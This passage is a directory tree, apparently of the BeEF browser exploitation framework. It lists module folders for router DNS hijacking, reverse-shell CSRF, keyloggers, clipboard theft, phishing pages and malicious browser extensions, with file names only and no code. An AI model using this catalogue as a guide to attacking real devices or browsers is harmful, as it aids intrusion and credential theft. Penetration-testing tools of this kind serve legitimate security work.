│ │ │ └── freenas_reverse_root_shell_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ntfscommoncreate_dos/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── opencart_reset_password/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── pfsense/
│ │ │ ├── pfsense_2.3.2_reverse_root_shell_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ ├── module.rb
│ │ │ │ └── x.js
│ │ │ └── pfsense_reverse_root_shell_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── php-5.3.9-dos/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── qemu_monitor_migrate_cmd_exec/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── qnx_qconn_command_execution/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── resource_exhaustion_dos/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── rfi_scanner/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ ├── rfi.txt
│ │ │ └── update-list
│ │ ├── router/
│ │ │ ├── 3com_officeconnect_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── actiontec_q1000_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── argw4_adsl_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── asmax_ar804gu_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── asus_dslx11_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── asus_rt_n12e_get_info/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── asus_rt_n66u_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── beetel_bcm96338_router_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── belkin_dns_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── bt_home_hub_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── cisco_e2400_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── comtrend_ct5367_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── comtrend_ct5624_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── comtrend_ct_series_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── ddwrt_v24_sp1_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── ddwrt_v24_sp1_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dir_615_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl2640b_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl2640u_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl2740r_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl2780b_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl500t_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dsl526b_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── exper_ewm01_adsl_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── huawei_smartax_mt880/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── iball_baton_ib_wra150n_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── inteno_eg101r1_voip_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_befsr41_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_e2500_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_e2500_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_e2500_shell/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_wrt54g2_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── linksys_wrt54g_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── netgear_dgn2000_wan_remote_mgmt/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── netgear_dgn2200_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── phillips_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── pikatel_96338_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── planet_vdr300nu_adsl_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── shuttle_tech_915wm_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── telstra_zte_mf91_change_pw/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── telstra_zte_mf91_change_ssid/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── telstra_zte_mf91_disable_ap_isolation/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── tenda_adsl_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── tplink_dns_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── utstarcom_wa3002g4_dns_hijack/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── virgin_superhub_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── wipg1000_cmd_injection/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ruby_nntpd_cmd_exec/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── shell_shock_scanner/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ ├── shocker-cgi_list
│ │ │ └── update-list
│ │ ├── shell_shocked/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── skype_xss/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── spring_framework_malicious_jar/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── switch/
│ │ │ ├── dlink_dgs_1100_device_reset/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dgs_1100_fdb_whitelist/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dgs_1100_port_mirroring/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── netgear_gs108t_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── vtiger_crm_upload_exploit/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── wanem_command_execution/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── wifi_pineapple_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── wordpress_add_admin/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── xss/
│ │ │ ├── alienvault_ossim_3.1_xss/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── cisco_collaboration_server_5_xss/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── serendipity_1.6_xss/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── sqlitemanager_xss/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zenoss_3x_command_execution/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zenoss_add_user_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── zeroshell/
│ │ ├── zeroshell_2_0rc2_admin_dynamic_token/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_admin_password/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_admin_static_token/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_file_disclosure/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_migrate_hook/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_reverse_shell_csrf_sop/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── x.js
│ │ └── zeroshell_2_0rc2_scanner/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── host/
│ │ ├── clipboard_theft/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_airdroid/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_antivirus/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_coupon_printer/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_cups/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_default_browser/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_google_desktop/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_hp/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_local_drives/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_protocol_handlers/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_software/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_users/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_battery_status/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_connection_type/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_internal_ip_java/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── get_internal_ip.java
│ │ │ └── module.rb
│ │ ├── get_internal_ip_webrtc/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_registry_keys/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_system_info_java/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── getSystemInfo.java
│ │ │ └── module.rb
│ │ ├── get_wireless_keys/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ ├── wirelessZeroConfig.jar
│ │ │ └── wirelessZeroConfig.java
│ │ ├── hook_default_browser/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── hook_microsoft_edge/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── insecure_url_skype/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── iphone_tel/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── physical_location/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── physical_location_thirdparty/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── ipec/
│ │ ├── cross_site_faxing/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── cross_site_printing/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── dns_tunnel/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── etag_client/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inter_protocol_imap/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inter_protocol_irc/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inter_protocol_posix_bindshell/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inter_protocol_redis/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inter_protocol_win_bindshell/
│ │ │ ├── command.js
│ │ │ ├── command.old.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── s2c_dns_tunnel/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── metasploit/
│ │ └── browser_autopwn/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── misc/
│ │ ├── blockui/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ibm_inotes/
│ │ │ ├── extract_inotes_list/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── inotes_flooder/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── read_inotes/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── send_inotes/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── send_inotes_with_attachment/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── iframe_keylogger/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── iframe_sniffer/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── leakyframe.js
│ │ │ └── module.rb
│ │ ├── invisible_iframe/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── local_file_theft/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── nosleep/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── update-lib
│ │ ├── raw_javascript/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── read_gmail/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── track_physical_movement/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── unblockui/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── wordpress/
│ │ │ ├── add_user/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── current_user_info/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── upload_rce_plugin/
│ │ │ │ ├── beefbind.php
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── wordpress_command.rb
│ │ │ └── wp.js
│ │ └── wordpress_post_auth_rce/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── network/
│ │ ├── ADC/
│ │ │ ├── f5_bigip_cookie_disclosure/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── f5_bigip_cookie_stealing/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── DOSer/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── worker.js
│ │ ├── cross_origin_scanner_cors/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── cross_origin_scanner_flash/
│ │ │ ├── ContentHijacking.swf
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── swfobject.js
│ │ ├── detect_burp/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_ethereum_ens/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_opennic/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_soc_nets/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_tor/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── dns_enumeration/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── dns_rebinding/
│ │ │ ├── README.md
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── fetch_port_scanner/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_http_servers/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_ntop_network_hosts/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_proxy_servers_wpad/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── identify_lan_subnets/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── internal_network_fingerprinting/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── jslanscanner/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── nat_pinning_irc/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ping_sweep/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ping_sweep_ff/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── ping_sweep_java/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── pingSweep.java
│ │ └── port_scanner/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── persistence/
│ │ ├── confirm_close_tab/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── hijack_opener/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── iframe_above/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── invisible_htmlfile_activex/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── jsonp_service_worker/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── man_in_the_browser/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── popunder_window/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── popunder_window_ie/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── phonegap/
│ │ ├── phonegap_alert_user/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_beep/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_check_connection/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_detect/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_file_upload/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_geo_locate/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_globalization_status/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_keychain/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_list_contacts/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_list_files/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_persist_resume/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_persistence/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_plugin_detection/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_prompt_user/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── phonegap_start_record_audio/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── phonegap_stop_record_audio/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ └── social_engineering/
│ ├── clickjacking/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── clippy/
│ │ ├── assets/
│ │ │ └── README.txt
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── edge_wscript_wsh_injection/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── fake_evernote_clipper/
│ │ ├── GothamSSm-Bold.otf
│ │ ├── GothamSSm-Medium.otf
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── login.css
│ │ ├── login.html
│ │ └── module.rb
│ ├── fake_flash_update/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── fake_lastpass/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── index-new.html
│ │ ├── index.html
│ │ └── module.rb
│ ├── fake_notification/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── fake_notification_c/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── fake_notification_ff/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── fake_notification_ie/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── firefox_extension_bindshell/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── extension/
│ │ │ ├── HTML5_Enhancements.xpi
│ │ │ ├── bootstrap.js
│ │ │ ├── build/
│ │ │ │ └── readme.txt
│ │ │ ├── chrome.manifest
│ │ │ ├── install.rdf
│ │ │ └── overlay.xul
│ │ └── module.rb
│ ├── firefox_extension_dropper/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── dropper/
│ │ │ └── readme.txt
│ │ ├── extension/
│ │ │ ├── bootstrap.js
│ │ │ ├── chrome.manifest
│ │ │ ├── install.rdf
│ │ │ └── overlay.xul
│ │ └── module.rb
│ ├── firefox_extension_reverse_shell/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── extension/
│ │ │ ├── HTML5_Enhancements.xpi
│ │ │ ├── bootstrap.js
│ │ │ ├── build/
│ │ │ │ └── readme.txt
│ │ │ ├── chrome.manifest
│ │ │ ├── install.rdf
│ │ │ └── overlay.xul
│ │ └── module.rb
│ ├── gmail_phishing/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── hta_powershell/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── lcamtuf_download/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── pretty_theft/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── replace_video_fake_plugin/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── simple_hijacker/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── module.rb
│ │ └── templates/
│ │ ├── amazon.js
│ │ ├── chromecertbeggar.js
│ │ ├── chromecertbeggar2.js
│ │ ├── confirmbox.js
│ │ └── credential.js
│ ├── sitekiosk_breakout/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── spoof_addressbar_data/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── tabnabbing/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── text_to_voice/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ └── ui_abuse_ie/
│ ├── command.js
│ ├── config.yaml
│ ├── module.rb
│ └── popunder.html
├── package.json
├── spec/
│ ├── beef/
│ │ ├── api/
│ │ │ └── auth_rate_spec.rb
│ │ ├── core/
│ │ │ ├── extension_spec.rb
│ │ │ ├── extensions_spec.rb
│ │ │ ├── filter/
│ │ │ │ ├── base_spec.rb
│ │ │ │ ├── browser_spec.rb
│ │ │ │ ├── command_spec.rb
│ │ │ │ ├── http_spec.rb
│ │ │ │ └── page_spec.rb
│ │ │ ├── logger_spec.rb
│ │ │ ├── main/
│ │ │ │ ├── autorun_engine/
│ │ │ │ │ └── autorun_engine_spec.rb
│ │ │ │ ├── command_spec.rb
│ │ │ │ ├── configuration_spec.rb
│ │ │ │ ├── crypto_spec.rb
│ │ │ │ ├── geoip_spec.rb
│ │ │ │ ├── handlers/
│ │ │ │ │ ├── browser_details_handler_spec.rb
│ │ │ │ │ ├── browserdetails_spec.rb
│ │ │ │ │ ├── commands_spec.rb
│ │ │ │ │ └── hookedbrowsers_spec.rb
│ │ │ │ ├── migration_spec.rb
│ │ │ │ ├── models/
│ │ │ │ │ ├── browser_details_spec.rb
│ │ │ │ │ ├── legacybrowseruseragents_spec.rb
│ │ │ │ │ ├── optioncache_spec.rb
│ │ │ │ │ └── result_spec.rb
│ │ │ │ ├── network_stack/
│ │ │ │ │ ├── assethandler_spec.rb
│ │ │ │ │ └── handlers/
│ │ │ │ │ ├── dynamic_reconstruction_spec.rb
│ │ │ │ │ ├── raw_spec.rb
│ │ │ │ │ └── redirector_spec.rb
│ │ │ │ ├── router/
│ │ │ │ │ └── router_spec.rb
│ │ │ │ └── server_spec.rb
│ │ │ ├── module_spec.rb
│ │ │ ├── modules_spec.rb
│ │ │ ├── ruby/
│ │ │ │ ├── hash_spec.rb
│ │ │ │ ├── module_spec.rb
